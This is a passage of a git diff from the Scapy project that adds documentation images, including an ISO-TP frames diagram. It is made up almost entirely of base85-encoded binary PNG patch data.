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 literal 0 HcmV?d00001 diff --git a/doc/scapy/graphics/automotive/isotp-frames.png b/doc/scapy/graphics/automotive/isotp-frames.png new file mode 100644 index 0000000000000000000000000000000000000000..a724f95e5fd1b1197c262d982d8f5e29ffc044ac GIT binary patch literal 38543 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 